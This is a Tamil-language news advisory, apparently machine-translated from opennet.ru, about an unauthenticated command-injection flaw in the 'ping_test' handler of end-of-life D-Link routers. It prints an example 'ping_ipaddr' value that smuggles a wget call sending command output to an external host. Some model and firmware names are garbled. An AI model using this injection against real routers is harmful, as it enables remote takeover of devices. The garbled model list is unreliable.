D-Link வயர்லெஸ் ரவுட்டர்களில் ஆபத்தான பாதிப்பு (), இது "ping_test" ஹேண்ட்லருக்கு ஒரு சிறப்பு கோரிக்கையை அனுப்புவதன் மூலம் சாதனத்தின் பக்கத்தில் உள்ள குறியீட்டை தொலைவிலிருந்து இயக்க அனுமதிக்கிறது, அங்கீகாரம் இல்லாமல் அணுகலாம்.
சுவாரஸ்யமாக, ஃபார்ம்வேர் டெவலப்பர்களின் கூற்றுப்படி, அங்கீகாரத்திற்குப் பிறகுதான் “ping_test” அழைப்பு செயல்படுத்தப்பட வேண்டும், ஆனால் உண்மையில் இது இணைய இடைமுகத்தில் உள்நுழைவதைப் பொருட்படுத்தாமல் எந்தவொரு சந்தர்ப்பத்திலும் அழைக்கப்படுகிறது. குறிப்பாக, apply_sec.cgi ஸ்கிரிப்டை அணுகி, “action=ping_test” அளவுருவை அனுப்பும்போது, ஸ்கிரிப்ட் அங்கீகாரப் பக்கத்திற்குத் திருப்பிவிடப்படும், ஆனால் அதே நேரத்தில் ping_test உடன் தொடர்புடைய செயலைச் செய்கிறது. குறியீட்டை இயக்க, மற்றொரு பாதிப்பு ping_test இல் பயன்படுத்தப்பட்டது, இது சோதனைக்கு அனுப்பப்பட்ட IP முகவரியின் சரியான தன்மையை சரியாகச் சரிபார்க்காமல் பிங் பயன்பாட்டை அழைக்கிறது. எடுத்துக்காட்டாக, wget பயன்பாட்டை அழைக்கவும், "echo 1234" கட்டளையின் முடிவுகளை வெளிப்புற ஹோஸ்டுக்கு மாற்றவும், "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// என்ற அளவுருவைக் குறிப்பிடவும். test.test/?$( எதிரொலி 1234)".
பாதிப்பின் இருப்பு அதிகாரப்பூர்வமாக பின்வரும் மாதிரிகளில் உறுதிப்படுத்தப்பட்டுள்ளது:
- ஃபார்ம்வேர் 655b3.02 அல்லது அதற்கு மேற்பட்ட DIR-05;
- ஃபார்ம்வேர் 866b1.03 அல்லது அதற்கு மேற்பட்ட DIR-04L;
- 1565 அல்லது அதற்கு மேற்பட்ட ஃபார்ம்வேர் கொண்ட DIR-1.01;
- DIR-652 (சிக்கலான ஃபார்ம்வேர் பதிப்புகள் பற்றிய எந்த தகவலும் வழங்கப்படவில்லை)
இந்த மாடல்களுக்கான ஆதரவு காலம் ஏற்கனவே காலாவதியாகிவிட்டது, எனவே D-Link , இது பாதிப்பை அகற்றுவதற்கான புதுப்பிப்புகளை வெளியிடாது, அவற்றைப் பயன்படுத்த பரிந்துரைக்காது மற்றும் புதிய சாதனங்களுடன் அவற்றை மாற்ற அறிவுறுத்துகிறது. ஒரு பாதுகாப்பு தீர்வாக, நம்பகமான IP முகவரிகளுக்கு மட்டுமே இணைய இடைமுகத்திற்கான அணுகலை நீங்கள் கட்டுப்படுத்தலாம்.
பாதிப்பும் இருந்தது பின்னர் கண்டுபிடிக்கப்பட்டது DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 மற்றும் DIR-825 ஆகிய மாடல்கள், மேம்படுத்தல்களை வெளியிடுவதற்கான திட்டங்கள் இன்னும் அறியப்படவில்லை.
ஆதாரம்: opennet.ru